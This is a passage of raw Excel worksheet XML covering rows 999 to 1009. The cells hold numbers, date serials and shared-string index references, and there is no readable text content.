      <c r="AU999">
        <v>20</v>
      </c>
      <c r="AV999">
        <v>1</v>
      </c>
      <c r="AW999">
        <v>2</v>
      </c>
      <c r="AX999">
        <v>1</v>
      </c>
      <c r="AY999">
        <v>2</v>
      </c>
      <c r="AZ999">
        <v>2</v>
      </c>
      <c r="BA999" t="s">
        <v>17515</v>
      </c>
      <c r="BB999">
        <v>0</v>
      </c>
      <c r="BC999" t="s">
        <v>11870</v>
      </c>
      <c r="BD999" t="s">
        <v>11937</v>
      </c>
    </row>
    <row r="1000" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1000">
        <v>4778</v>
      </c>
      <c r="B1000" t="s">
        <v>7634</v>
      </c>
      <c r="C1000" t="s">
        <v>47</v>
      </c>
      <c r="D1000" t="s">
        <v>7635</v>
      </c>
      <c r="E1000" t="s">
        <v>363</v>
      </c>
      <c r="F1000" t="s">
        <v>7636</v>
      </c>
      <c r="G1000" s="1">
        <v>44176</v>
      </c>
      <c r="H1000">
        <v>6074</v>
      </c>
      <c r="I1000">
        <v>6074</v>
      </c>
      <c r="J1000">
        <v>0</v>
      </c>
      <c r="K1000">
        <v>0</v>
      </c>
      <c r="L1000">
        <v>0</v>
      </c>
      <c r="M1000">
        <v>0</v>
      </c>
      <c r="N1000">
        <v>0</v>
      </c>
      <c r="O1000">
        <v>0</v>
      </c>
      <c r="P1000">
        <v>0</v>
      </c>
      <c r="Q1000">
        <v>0</v>
      </c>
      <c r="R1000">
        <v>0</v>
      </c>
      <c r="S1000">
        <v>0</v>
      </c>
      <c r="T1000">
        <v>1</v>
      </c>
      <c r="U1000">
        <v>0</v>
      </c>
      <c r="V1000">
        <v>0</v>
      </c>
      <c r="W1000">
        <v>0</v>
      </c>
      <c r="X1000">
        <v>0</v>
      </c>
      <c r="Y1000">
        <v>0</v>
      </c>
      <c r="Z1000">
        <v>0</v>
      </c>
      <c r="AA1000">
        <v>0</v>
      </c>
      <c r="AB1000">
        <v>0</v>
      </c>
      <c r="AC1000">
        <v>0</v>
      </c>
      <c r="AD1000">
        <v>0</v>
      </c>
      <c r="AE1000">
        <v>10000</v>
      </c>
      <c r="AF1000" t="s">
        <v>7637</v>
      </c>
      <c r="AG1000">
        <v>20146</v>
      </c>
      <c r="AH1000">
        <v>2</v>
      </c>
      <c r="AJ1000">
        <v>53</v>
      </c>
      <c r="AK1000" t="s">
        <v>7638</v>
      </c>
      <c r="AL1000" t="s">
        <v>7639</v>
      </c>
      <c r="AM1000" t="s">
        <v>7640</v>
      </c>
      <c r="AN1000" t="s">
        <v>55</v>
      </c>
      <c r="AO1000">
        <v>2018</v>
      </c>
      <c r="AP1000">
        <v>8116328977</v>
      </c>
      <c r="AQ1000" t="s">
        <v>7641</v>
      </c>
      <c r="AR1000" t="s">
        <v>7637</v>
      </c>
      <c r="AS1000" t="s">
        <v>71</v>
      </c>
      <c r="AT1000" t="s">
        <v>58</v>
      </c>
      <c r="AU1000">
        <v>26</v>
      </c>
      <c r="AV1000">
        <v>0</v>
      </c>
      <c r="AW1000">
        <v>3</v>
      </c>
      <c r="AX1000">
        <v>3</v>
      </c>
      <c r="AY1000">
        <v>3</v>
      </c>
      <c r="AZ1000">
        <v>2</v>
      </c>
      <c r="BA1000" t="s">
        <v>17404</v>
      </c>
      <c r="BB1000" t="s">
        <v>17423</v>
      </c>
      <c r="BC1000" t="s">
        <v>9952</v>
      </c>
      <c r="BD1000" t="s">
        <v>10668</v>
      </c>
    </row>
    <row r="1001" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1001">
        <v>4796</v>
      </c>
      <c r="B1001" t="s">
        <v>7642</v>
      </c>
      <c r="C1001" t="s">
        <v>47</v>
      </c>
      <c r="D1001" t="s">
        <v>7643</v>
      </c>
      <c r="E1001" t="s">
        <v>6159</v>
      </c>
      <c r="F1001" t="s">
        <v>7644</v>
      </c>
      <c r="G1001" s="1">
        <v>44097</v>
      </c>
      <c r="H1001">
        <v>6100</v>
      </c>
      <c r="I1001">
        <v>6100</v>
      </c>
      <c r="J1001">
        <v>1</v>
      </c>
      <c r="K1001">
        <v>0</v>
      </c>
      <c r="L1001">
        <v>1</v>
      </c>
      <c r="M1001">
        <v>0</v>
      </c>
      <c r="N1001">
        <v>0</v>
      </c>
      <c r="O1001">
        <v>0</v>
      </c>
      <c r="P1001">
        <v>0</v>
      </c>
      <c r="Q1001">
        <v>0</v>
      </c>
      <c r="R1001">
        <v>0</v>
      </c>
      <c r="S1001">
        <v>0</v>
      </c>
      <c r="T1001">
        <v>0</v>
      </c>
      <c r="U1001">
        <v>30000</v>
      </c>
      <c r="V1001">
        <v>0</v>
      </c>
      <c r="W1001">
        <v>3000</v>
      </c>
      <c r="X1001">
        <v>0</v>
      </c>
      <c r="Y1001">
        <v>0</v>
      </c>
      <c r="Z1001">
        <v>0</v>
      </c>
      <c r="AA1001">
        <v>0</v>
      </c>
      <c r="AB1001">
        <v>0</v>
      </c>
      <c r="AC1001">
        <v>0</v>
      </c>
      <c r="AD1001">
        <v>0</v>
      </c>
      <c r="AE1001">
        <v>0</v>
      </c>
      <c r="AF1001" t="s">
        <v>7645</v>
      </c>
      <c r="AG1001">
        <v>20236</v>
      </c>
      <c r="AH1001">
        <v>2</v>
      </c>
      <c r="AJ1001">
        <v>53</v>
      </c>
      <c r="AK1001" t="s">
        <v>3055</v>
      </c>
      <c r="AL1001" t="s">
        <v>7372</v>
      </c>
      <c r="AM1001" t="s">
        <v>7646</v>
      </c>
      <c r="AN1001" t="s">
        <v>55</v>
      </c>
      <c r="AO1001">
        <v>2020</v>
      </c>
      <c r="AP1001">
        <v>85261700633</v>
      </c>
      <c r="AQ1001">
        <v>85261700633</v>
      </c>
      <c r="AR1001" t="s">
        <v>7645</v>
      </c>
      <c r="AS1001" t="s">
        <v>71</v>
      </c>
      <c r="AT1001" t="s">
        <v>58</v>
      </c>
      <c r="AU1001">
        <v>26</v>
      </c>
      <c r="AV1001">
        <v>1</v>
      </c>
      <c r="AW1001">
        <v>15</v>
      </c>
      <c r="AX1001">
        <v>6</v>
      </c>
      <c r="AY1001">
        <v>0</v>
      </c>
      <c r="AZ1001">
        <v>1</v>
      </c>
      <c r="BA1001" t="s">
        <v>17412</v>
      </c>
      <c r="BB1001">
        <v>0</v>
      </c>
      <c r="BC1001">
        <v>0</v>
      </c>
      <c r="BD1001">
        <v>0</v>
      </c>
    </row>
    <row r="1002" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1002">
        <v>4832</v>
      </c>
      <c r="B1002" t="s">
        <v>6157</v>
      </c>
      <c r="C1002" t="s">
        <v>318</v>
      </c>
      <c r="D1002" t="s">
        <v>7647</v>
      </c>
      <c r="E1002" t="s">
        <v>300</v>
      </c>
      <c r="F1002" t="s">
        <v>7648</v>
      </c>
      <c r="G1002" s="1">
        <v>44253</v>
      </c>
      <c r="H1002">
        <v>6124</v>
      </c>
      <c r="I1002">
        <v>6124</v>
      </c>
      <c r="J1002">
        <v>3</v>
      </c>
      <c r="K1002">
        <v>0</v>
      </c>
      <c r="L1002">
        <v>1</v>
      </c>
      <c r="M1002">
        <v>3</v>
      </c>
      <c r="N1002">
        <v>0</v>
      </c>
      <c r="O1002">
        <v>0</v>
      </c>
      <c r="P1002">
        <v>0</v>
      </c>
      <c r="Q1002">
        <v>15</v>
      </c>
      <c r="R1002">
        <v>35</v>
      </c>
      <c r="S1002">
        <v>0</v>
      </c>
      <c r="T1002">
        <v>0</v>
      </c>
      <c r="U1002">
        <v>18</v>
      </c>
      <c r="V1002">
        <v>0</v>
      </c>
      <c r="W1002">
        <v>7500</v>
      </c>
      <c r="X1002">
        <v>10</v>
      </c>
      <c r="Y1002">
        <v>0</v>
      </c>
      <c r="Z1002">
        <v>0</v>
      </c>
      <c r="AA1002">
        <v>0</v>
      </c>
      <c r="AB1002">
        <v>1000</v>
      </c>
      <c r="AC1002">
        <v>500</v>
      </c>
      <c r="AD1002">
        <v>0</v>
      </c>
      <c r="AE1002">
        <v>0</v>
      </c>
      <c r="AF1002" t="s">
        <v>6161</v>
      </c>
      <c r="AG1002">
        <v>90241</v>
      </c>
      <c r="AH1002">
        <v>26</v>
      </c>
      <c r="AJ1002">
        <v>420</v>
      </c>
      <c r="AK1002" t="s">
        <v>331</v>
      </c>
      <c r="AL1002" t="s">
        <v>332</v>
      </c>
      <c r="AM1002" t="s">
        <v>7649</v>
      </c>
      <c r="AN1002" t="s">
        <v>55</v>
      </c>
      <c r="AO1002">
        <v>1991</v>
      </c>
      <c r="AP1002" t="s">
        <v>6163</v>
      </c>
      <c r="AQ1002" t="s">
        <v>6164</v>
      </c>
      <c r="AR1002" t="s">
        <v>6165</v>
      </c>
      <c r="AS1002" t="s">
        <v>71</v>
      </c>
      <c r="AT1002" t="s">
        <v>58</v>
      </c>
      <c r="AU1002">
        <v>24</v>
      </c>
      <c r="AV1002">
        <v>1</v>
      </c>
      <c r="AW1002">
        <v>100</v>
      </c>
      <c r="AX1002">
        <v>288</v>
      </c>
      <c r="AY1002">
        <v>55</v>
      </c>
      <c r="AZ1002">
        <v>69</v>
      </c>
      <c r="BA1002" t="s">
        <v>17076</v>
      </c>
      <c r="BB1002" t="s">
        <v>16037</v>
      </c>
      <c r="BC1002">
        <v>0</v>
      </c>
      <c r="BD1002" t="s">
        <v>11961</v>
      </c>
    </row>
    <row r="1003" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1003">
        <v>4962</v>
      </c>
      <c r="B1003" t="s">
        <v>2612</v>
      </c>
      <c r="C1003" t="s">
        <v>318</v>
      </c>
      <c r="D1003" t="s">
        <v>7650</v>
      </c>
      <c r="E1003" t="s">
        <v>7651</v>
      </c>
      <c r="F1003" t="s">
        <v>7652</v>
      </c>
      <c r="G1003" s="1">
        <v>44274</v>
      </c>
      <c r="H1003">
        <v>6145</v>
      </c>
      <c r="I1003">
        <v>6145</v>
      </c>
      <c r="J1003">
        <v>2</v>
      </c>
      <c r="K1003">
        <v>2</v>
      </c>
      <c r="L1003">
        <v>1</v>
      </c>
      <c r="M1003">
        <v>0</v>
      </c>
      <c r="N1003">
        <v>0</v>
      </c>
      <c r="O1003">
        <v>0</v>
      </c>
      <c r="P1003">
        <v>4</v>
      </c>
      <c r="Q1003">
        <v>0</v>
      </c>
      <c r="R1003">
        <v>0</v>
      </c>
      <c r="S1003">
        <v>0</v>
      </c>
      <c r="T1003">
        <v>0</v>
      </c>
      <c r="U1003">
        <v>13000</v>
      </c>
      <c r="V1003">
        <v>13000</v>
      </c>
      <c r="W1003">
        <v>1000</v>
      </c>
      <c r="X1003">
        <v>0</v>
      </c>
      <c r="Y1003">
        <v>0</v>
      </c>
      <c r="Z1003">
        <v>0</v>
      </c>
      <c r="AA1003">
        <v>1000</v>
      </c>
      <c r="AB1003">
        <v>0</v>
      </c>
      <c r="AC1003">
        <v>0</v>
      </c>
      <c r="AD1003">
        <v>0</v>
      </c>
      <c r="AE1003">
        <v>0</v>
      </c>
      <c r="AF1003" t="s">
        <v>2615</v>
      </c>
      <c r="AG1003">
        <v>90753</v>
      </c>
      <c r="AH1003">
        <v>26</v>
      </c>
      <c r="AJ1003">
        <v>408</v>
      </c>
      <c r="AK1003" t="s">
        <v>7653</v>
      </c>
      <c r="AL1003" t="s">
        <v>7654</v>
      </c>
      <c r="AM1003" t="s">
        <v>7655</v>
      </c>
      <c r="AN1003" t="s">
        <v>55</v>
      </c>
      <c r="AO1003">
        <v>1998</v>
      </c>
      <c r="AP1003" t="s">
        <v>7656</v>
      </c>
      <c r="AQ1003" t="s">
        <v>7657</v>
      </c>
      <c r="AR1003" t="s">
        <v>7658</v>
      </c>
      <c r="AS1003" t="s">
        <v>71</v>
      </c>
      <c r="AT1003" t="s">
        <v>58</v>
      </c>
      <c r="AU1003">
        <v>20</v>
      </c>
      <c r="AV1003">
        <v>3</v>
      </c>
      <c r="AW1003">
        <v>103</v>
      </c>
      <c r="AX1003">
        <v>3</v>
      </c>
      <c r="AY1003">
        <v>13</v>
      </c>
      <c r="AZ1003">
        <v>2</v>
      </c>
      <c r="BA1003" t="s">
        <v>16714</v>
      </c>
      <c r="BB1003" t="s">
        <v>14653</v>
      </c>
      <c r="BC1003">
        <v>0</v>
      </c>
      <c r="BD1003" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="1004" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1004">
        <v>4969</v>
      </c>
      <c r="B1004" t="s">
        <v>7659</v>
      </c>
      <c r="C1004" t="s">
        <v>318</v>
      </c>
      <c r="D1004" t="s">
        <v>7660</v>
      </c>
      <c r="E1004" t="s">
        <v>843</v>
      </c>
      <c r="F1004" t="s">
        <v>4686</v>
      </c>
      <c r="G1004" s="1">
        <v>44099</v>
      </c>
      <c r="H1004">
        <v>6153</v>
      </c>
      <c r="I1004">
        <v>6153</v>
      </c>
      <c r="J1004">
        <v>0</v>
      </c>
      <c r="K1004">
        <v>0</v>
      </c>
      <c r="L1004">
        <v>0</v>
      </c>
      <c r="M1004">
        <v>0</v>
      </c>
      <c r="N1004">
        <v>0</v>
      </c>
      <c r="O1004">
        <v>0</v>
      </c>
      <c r="P1004">
        <v>0</v>
      </c>
      <c r="Q1004">
        <v>0</v>
      </c>
      <c r="R1004">
        <v>0</v>
      </c>
      <c r="S1004">
        <v>0</v>
      </c>
      <c r="T1004">
        <v>1</v>
      </c>
      <c r="U1004">
        <v>0</v>
      </c>
      <c r="V1004">
        <v>0</v>
      </c>
      <c r="W1004">
        <v>0</v>
      </c>
      <c r="X1004">
        <v>0</v>
      </c>
      <c r="Y1004">
        <v>0</v>
      </c>
      <c r="Z1004">
        <v>0</v>
      </c>
      <c r="AA1004">
        <v>0</v>
      </c>
      <c r="AB1004">
        <v>0</v>
      </c>
      <c r="AC1004">
        <v>0</v>
      </c>
      <c r="AD1004">
        <v>0</v>
      </c>
      <c r="AE1004">
        <v>5000</v>
      </c>
      <c r="AF1004" t="s">
        <v>7661</v>
      </c>
      <c r="AG1004">
        <v>90242</v>
      </c>
      <c r="AH1004">
        <v>26</v>
      </c>
      <c r="AJ1004">
        <v>420</v>
      </c>
      <c r="AK1004" t="s">
        <v>331</v>
      </c>
      <c r="AL1004" t="s">
        <v>7662</v>
      </c>
      <c r="AM1004" t="s">
        <v>7663</v>
      </c>
      <c r="AN1004" t="s">
        <v>55</v>
      </c>
      <c r="AO1004">
        <v>2020</v>
      </c>
      <c r="AP1004" t="s">
        <v>7664</v>
      </c>
      <c r="AQ1004" t="s">
        <v>7665</v>
      </c>
      <c r="AR1004" t="s">
        <v>7661</v>
      </c>
      <c r="AU1004">
        <v>26</v>
      </c>
      <c r="AV1004">
        <v>0</v>
      </c>
      <c r="AW1004">
        <v>1</v>
      </c>
      <c r="AX1004">
        <v>0</v>
      </c>
      <c r="AY1004">
        <v>4</v>
      </c>
      <c r="AZ1004">
        <v>0</v>
      </c>
      <c r="BA1004" t="s">
        <v>17519</v>
      </c>
      <c r="BB1004" t="s">
        <v>16064</v>
      </c>
      <c r="BC1004">
        <v>0</v>
      </c>
      <c r="BD1004" t="s">
        <v>12002</v>
      </c>
    </row>
    <row r="1005" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1005">
        <v>4954</v>
      </c>
      <c r="B1005" t="s">
        <v>7666</v>
      </c>
      <c r="C1005" t="s">
        <v>4653</v>
      </c>
      <c r="D1005" t="s">
        <v>7667</v>
      </c>
      <c r="E1005" t="s">
        <v>843</v>
      </c>
      <c r="F1005" t="s">
        <v>7668</v>
      </c>
      <c r="G1005" s="1">
        <v>44151</v>
      </c>
      <c r="H1005">
        <v>6194</v>
      </c>
      <c r="I1005">
        <v>6194</v>
      </c>
      <c r="J1005">
        <v>0</v>
      </c>
      <c r="K1005">
        <v>1</v>
      </c>
      <c r="L1005">
        <v>0</v>
      </c>
      <c r="M1005">
        <v>0</v>
      </c>
      <c r="N1005">
        <v>0</v>
      </c>
      <c r="O1005">
        <v>0</v>
      </c>
      <c r="P1005">
        <v>0</v>
      </c>
      <c r="Q1005">
        <v>0</v>
      </c>
      <c r="R1005">
        <v>50</v>
      </c>
      <c r="S1005">
        <v>0</v>
      </c>
      <c r="T1005">
        <v>0</v>
      </c>
      <c r="U1005">
        <v>0</v>
      </c>
      <c r="V1005">
        <v>2000</v>
      </c>
      <c r="W1005">
        <v>0</v>
      </c>
      <c r="X1005">
        <v>0</v>
      </c>
      <c r="Y1005">
        <v>0</v>
      </c>
      <c r="Z1005">
        <v>0</v>
      </c>
      <c r="AA1005">
        <v>0</v>
      </c>
      <c r="AB1005">
        <v>0</v>
      </c>
      <c r="AC1005">
        <v>5000</v>
      </c>
      <c r="AD1005">
        <v>0</v>
      </c>
      <c r="AE1005">
        <v>0</v>
      </c>
      <c r="AF1005" t="s">
        <v>7669</v>
      </c>
      <c r="AG1005">
        <v>36511</v>
      </c>
      <c r="AH1005">
        <v>7</v>
      </c>
      <c r="AJ1005">
        <v>94</v>
      </c>
      <c r="AK1005" t="s">
        <v>7439</v>
      </c>
      <c r="AL1005" t="s">
        <v>7670</v>
      </c>
      <c r="AM1005" t="s">
        <v>7671</v>
      </c>
      <c r="AN1005" t="s">
        <v>68</v>
      </c>
      <c r="AO1005">
        <v>2018</v>
      </c>
      <c r="AP1005">
        <v>8117456990</v>
      </c>
      <c r="AQ1005" t="s">
        <v>7672</v>
      </c>
      <c r="AR1005" t="s">
        <v>7669</v>
      </c>
      <c r="AS1005" t="s">
        <v>71</v>
      </c>
      <c r="AT1005" t="s">
        <v>72</v>
      </c>
      <c r="AU1005">
        <v>30</v>
      </c>
      <c r="AV1005">
        <v>1</v>
      </c>
      <c r="AW1005">
        <v>16</v>
      </c>
      <c r="AX1005">
        <v>0</v>
      </c>
      <c r="AY1005">
        <v>1</v>
      </c>
      <c r="AZ1005">
        <v>2</v>
      </c>
      <c r="BA1005" t="s">
        <v>17509</v>
      </c>
      <c r="BB1005">
        <v>0</v>
      </c>
      <c r="BC1005" t="s">
        <v>12000</v>
      </c>
      <c r="BD1005" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="1006" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1006">
        <v>4879</v>
      </c>
      <c r="B1006" t="s">
        <v>4891</v>
      </c>
      <c r="C1006" t="s">
        <v>168</v>
      </c>
      <c r="D1006" t="s">
        <v>7673</v>
      </c>
      <c r="E1006" t="s">
        <v>274</v>
      </c>
      <c r="F1006" t="s">
        <v>143</v>
      </c>
      <c r="G1006" s="1">
        <v>44126</v>
      </c>
      <c r="H1006">
        <v>6234</v>
      </c>
      <c r="I1006">
        <v>6234</v>
      </c>
      <c r="J1006">
        <v>5</v>
      </c>
      <c r="K1006">
        <v>2</v>
      </c>
      <c r="L1006">
        <v>0</v>
      </c>
      <c r="M1006">
        <v>5</v>
      </c>
      <c r="N1006">
        <v>0</v>
      </c>
      <c r="O1006">
        <v>0</v>
      </c>
      <c r="P1006">
        <v>0</v>
      </c>
      <c r="Q1006">
        <v>0</v>
      </c>
      <c r="R1006">
        <v>0</v>
      </c>
      <c r="S1006">
        <v>0</v>
      </c>
      <c r="T1006">
        <v>2</v>
      </c>
      <c r="U1006">
        <v>4</v>
      </c>
      <c r="V1006">
        <v>500</v>
      </c>
      <c r="W1006">
        <v>0</v>
      </c>
      <c r="X1006">
        <v>5</v>
      </c>
      <c r="Y1006">
        <v>0</v>
      </c>
      <c r="Z1006">
        <v>0</v>
      </c>
      <c r="AA1006">
        <v>0</v>
      </c>
      <c r="AB1006">
        <v>0</v>
      </c>
      <c r="AC1006">
        <v>0</v>
      </c>
      <c r="AD1006">
        <v>0</v>
      </c>
      <c r="AE1006">
        <v>2</v>
      </c>
      <c r="AF1006" t="s">
        <v>7674</v>
      </c>
      <c r="AG1006">
        <v>45475</v>
      </c>
      <c r="AH1006">
        <v>13</v>
      </c>
      <c r="AJ1006">
        <v>170</v>
      </c>
      <c r="AK1006" t="s">
        <v>7675</v>
      </c>
      <c r="AL1006" t="s">
        <v>7676</v>
      </c>
      <c r="AM1006" t="s">
        <v>7677</v>
      </c>
      <c r="AN1006" t="s">
        <v>55</v>
      </c>
      <c r="AO1006">
        <v>1995</v>
      </c>
      <c r="AP1006">
        <v>22338864949</v>
      </c>
      <c r="AQ1006" t="s">
        <v>7678</v>
      </c>
      <c r="AR1006" t="s">
        <v>7679</v>
      </c>
      <c r="AS1006" t="s">
        <v>71</v>
      </c>
      <c r="AT1006" t="s">
        <v>58</v>
      </c>
      <c r="AU1006">
        <v>0</v>
      </c>
      <c r="AV1006">
        <v>0</v>
      </c>
      <c r="AW1006">
        <v>40</v>
      </c>
      <c r="AX1006">
        <v>19</v>
      </c>
      <c r="AY1006">
        <v>18</v>
      </c>
      <c r="AZ1006">
        <v>3</v>
      </c>
      <c r="BA1006" t="s">
        <v>17152</v>
      </c>
      <c r="BB1006" t="s">
        <v>15867</v>
      </c>
      <c r="BC1006" t="s">
        <v>11995</v>
      </c>
      <c r="BD1006">
        <v>0</v>
      </c>
    </row>
    <row r="1007" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1007">
        <v>4858</v>
      </c>
      <c r="B1007" t="s">
        <v>7680</v>
      </c>
      <c r="C1007" t="s">
        <v>168</v>
      </c>
      <c r="D1007" t="s">
        <v>7681</v>
      </c>
      <c r="E1007" t="s">
        <v>111</v>
      </c>
      <c r="F1007" t="s">
        <v>7682</v>
      </c>
      <c r="G1007" s="1">
        <v>44126</v>
      </c>
      <c r="H1007">
        <v>6250</v>
      </c>
      <c r="I1007">
        <v>6250</v>
      </c>
      <c r="J1007">
        <v>1</v>
      </c>
      <c r="K1007">
        <v>1</v>
      </c>
      <c r="L1007">
        <v>0</v>
      </c>
      <c r="M1007">
        <v>0</v>
      </c>
      <c r="N1007">
        <v>0</v>
      </c>
      <c r="O1007">
        <v>0</v>
      </c>
      <c r="P1007">
        <v>0</v>
      </c>
      <c r="Q1007">
        <v>0</v>
      </c>
      <c r="R1007">
        <v>0</v>
      </c>
      <c r="S1007">
        <v>0</v>
      </c>
      <c r="T1007">
        <v>0</v>
      </c>
      <c r="U1007">
        <v>800000</v>
      </c>
      <c r="V1007">
        <v>800000</v>
      </c>
      <c r="W1007">
        <v>0</v>
      </c>
      <c r="X1007">
        <v>0</v>
      </c>
      <c r="Y1007">
        <v>0</v>
      </c>
      <c r="Z1007">
        <v>0</v>
      </c>
      <c r="AA1007">
        <v>0</v>
      </c>
      <c r="AB1007">
        <v>0</v>
      </c>
      <c r="AC1007">
        <v>0</v>
      </c>
      <c r="AD1007">
        <v>0</v>
      </c>
      <c r="AE1007">
        <v>0</v>
      </c>
      <c r="AF1007" t="s">
        <v>7683</v>
      </c>
      <c r="AG1007">
        <v>16517</v>
      </c>
      <c r="AH1007">
        <v>13</v>
      </c>
      <c r="AJ1007">
        <v>184</v>
      </c>
      <c r="AK1007" t="s">
        <v>7684</v>
      </c>
      <c r="AL1007" t="s">
        <v>2492</v>
      </c>
      <c r="AM1007" t="s">
        <v>7685</v>
      </c>
      <c r="AN1007" t="s">
        <v>55</v>
      </c>
      <c r="AO1007">
        <v>2016</v>
      </c>
      <c r="AP1007" t="s">
        <v>2494</v>
      </c>
      <c r="AQ1007" t="s">
        <v>7686</v>
      </c>
      <c r="AR1007" t="s">
        <v>7687</v>
      </c>
      <c r="AS1007" t="s">
        <v>179</v>
      </c>
      <c r="AT1007" t="s">
        <v>58</v>
      </c>
      <c r="AU1007">
        <v>0</v>
      </c>
      <c r="AV1007">
        <v>0</v>
      </c>
      <c r="AW1007">
        <v>0</v>
      </c>
      <c r="AX1007">
        <v>0</v>
      </c>
      <c r="AY1007">
        <v>7</v>
      </c>
      <c r="AZ1007">
        <v>3</v>
      </c>
      <c r="BA1007" t="s">
        <v>17450</v>
      </c>
      <c r="BB1007" t="s">
        <v>16043</v>
      </c>
      <c r="BC1007" t="s">
        <v>12014</v>
      </c>
      <c r="BD1007">
        <v>0</v>
      </c>
    </row>
    <row r="1008" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1008">
        <v>4982</v>
      </c>
      <c r="B1008" t="s">
        <v>7688</v>
      </c>
      <c r="C1008" t="s">
        <v>477</v>
      </c>
      <c r="D1008" t="s">
        <v>3821</v>
      </c>
      <c r="E1008" t="s">
        <v>843</v>
      </c>
      <c r="F1008" t="s">
        <v>4686</v>
      </c>
      <c r="G1008" s="1">
        <v>44113</v>
      </c>
      <c r="H1008">
        <v>6285</v>
      </c>
      <c r="I1008">
        <v>6285</v>
      </c>
      <c r="J1008">
        <v>0</v>
      </c>
      <c r="K1008">
        <v>1</v>
      </c>
      <c r="L1008">
        <v>1</v>
      </c>
      <c r="M1008">
        <v>0</v>
      </c>
      <c r="N1008">
        <v>0</v>
      </c>
      <c r="O1008">
        <v>0</v>
      </c>
      <c r="P1008">
        <v>0</v>
      </c>
      <c r="Q1008">
        <v>2</v>
      </c>
      <c r="R1008">
        <v>4</v>
      </c>
      <c r="S1008">
        <v>0</v>
      </c>
      <c r="T1008">
        <v>0</v>
      </c>
      <c r="U1008">
        <v>0</v>
      </c>
      <c r="V1008">
        <v>3000</v>
      </c>
      <c r="W1008">
        <v>3000</v>
      </c>
      <c r="X1008">
        <v>0</v>
      </c>
      <c r="Y1008">
        <v>0</v>
      </c>
      <c r="Z1008">
        <v>0</v>
      </c>
      <c r="AA1008">
        <v>0</v>
      </c>
      <c r="AB1008">
        <v>2000</v>
      </c>
      <c r="AC1008">
        <v>2000</v>
      </c>
      <c r="AD1008">
        <v>0</v>
      </c>
      <c r="AE1008">
        <v>0</v>
      </c>
      <c r="AF1008" t="s">
        <v>3728</v>
      </c>
      <c r="AG1008">
        <v>95526</v>
      </c>
      <c r="AH1008">
        <v>29</v>
      </c>
      <c r="AJ1008">
        <v>383</v>
      </c>
      <c r="AK1008" t="s">
        <v>2986</v>
      </c>
      <c r="AL1008" t="s">
        <v>3596</v>
      </c>
      <c r="AM1008" t="s">
        <v>7689</v>
      </c>
      <c r="AN1008" t="s">
        <v>55</v>
      </c>
      <c r="AO1008">
        <v>2020</v>
      </c>
      <c r="AP1008" t="s">
        <v>623</v>
      </c>
      <c r="AQ1008" t="s">
        <v>7690</v>
      </c>
      <c r="AR1008" t="s">
        <v>3728</v>
      </c>
      <c r="AS1008" t="s">
        <v>71</v>
      </c>
      <c r="AT1008" t="s">
        <v>58</v>
      </c>
      <c r="AU1008">
        <v>26</v>
      </c>
      <c r="AV1008">
        <v>0</v>
      </c>
      <c r="AW1008">
        <v>0</v>
      </c>
      <c r="AX1008">
        <v>0</v>
      </c>
      <c r="AY1008">
        <v>7</v>
      </c>
      <c r="AZ1008">
        <v>5</v>
      </c>
      <c r="BA1008" t="s">
        <v>17525</v>
      </c>
      <c r="BB1008">
        <v>0</v>
      </c>
      <c r="BC1008">
        <v>0</v>
      </c>
      <c r="BD1008" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1009" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1009">
        <v>4967</v>
      </c>
      <c r="B1009" t="s">
        <v>7691</v>
      </c>
      <c r="C1009" t="s">
        <v>1310</v>
      </c>
      <c r="D1009" t="s">
        <v>7692</v>
      </c>
      <c r="E1009" t="s">
        <v>843</v>
      </c>
      <c r="F1009" t="s">
        <v>7693</v>
      </c>
      <c r="G1009" s="1">
        <v>44210</v>
      </c>
      <c r="H1009">
        <v>6332</v>
      </c>
      <c r="I1009">
        <v>6332</v>
      </c>
      <c r="J1009">
        <v>0</v>
      </c>
      <c r="K1009">
        <v>0</v>
      </c>
      <c r="L1009">
        <v>0</v>
      </c>
      <c r="M1009">
        <v>0</v>
      </c>
      <c r="N1009">
        <v>0</v>
      </c>
      <c r="O1009">
        <v>0</v>
      </c>
      <c r="P1009">
        <v>0</v>
      </c>
      <c r="Q1009">
        <v>0</v>
      </c>
      <c r="R1009">
        <v>0</v>
      </c>
      <c r="S1009">
        <v>1</v>
      </c>
      <c r="T1009">
        <v>1</v>
      </c>
      <c r="U1009">
        <v>0</v>
      </c>
      <c r="V1009">
        <v>0</v>
      </c>
      <c r="W1009">
        <v>0</v>
      </c>
      <c r="X1009">
        <v>0</v>
      </c>
      <c r="Y1009">
        <v>0</v>
      </c>
      <c r="Z1009">
        <v>0</v>
      </c>
      <c r="AA1009">
        <v>0</v>
      </c>
      <c r="AB1009">
        <v>0</v>
      </c>
      <c r="AC1009">
        <v>0</v>
      </c>
      <c r="AD1009">
        <v>1</v>
      </c>
      <c r="AE1009">
        <v>20000</v>
      </c>
      <c r="AF1009" t="s">
        <v>7694</v>
      </c>
      <c r="AG1009">
        <v>78381</v>
      </c>
      <c r="AH1009">
        <v>20</v>
      </c>
      <c r="AJ1009">
        <v>326</v>
      </c>
      <c r="AK1009" t="s">
        <v>7695</v>
      </c>
      <c r="AL1009" t="s">
        <v>7695</v>
      </c>
      <c r="AM1009" t="s">
        <v>7696</v>
      </c>
      <c r="AN1009" t="s">
        <v>55</v>
      </c>
      <c r="AO1009">
        <v>2020</v>
      </c>
      <c r="AP1009">
        <v>82158355577</v>
      </c>
      <c r="AQ1009" t="s">
        <v>7697</v>
      </c>
      <c r="AR1009" t="s">
        <v>7694</v>
      </c>
      <c r="AS1009" t="s">
        <v>71</v>
      </c>
      <c r="AT1009" t="s">
        <v>58</v>
      </c>
      <c r="AU1009">
        <v>24</v>
      </c>
      <c r="AV1009">
        <v>1</v>
      </c>
      <c r="AW1009">
        <v>4</v>
      </c>
      <c r="AX1009">
        <v>4</v>
      </c>
      <c r="AY1009">
        <v>3</v>
      </c>
      <c r="AZ1009">
        <v>1</v>
      </c>
      <c r="BA1009" t="s">
        <v>17517</v>
      </c>
      <c r="BB1009" t="s">
        <v>16062</v>
      </c>
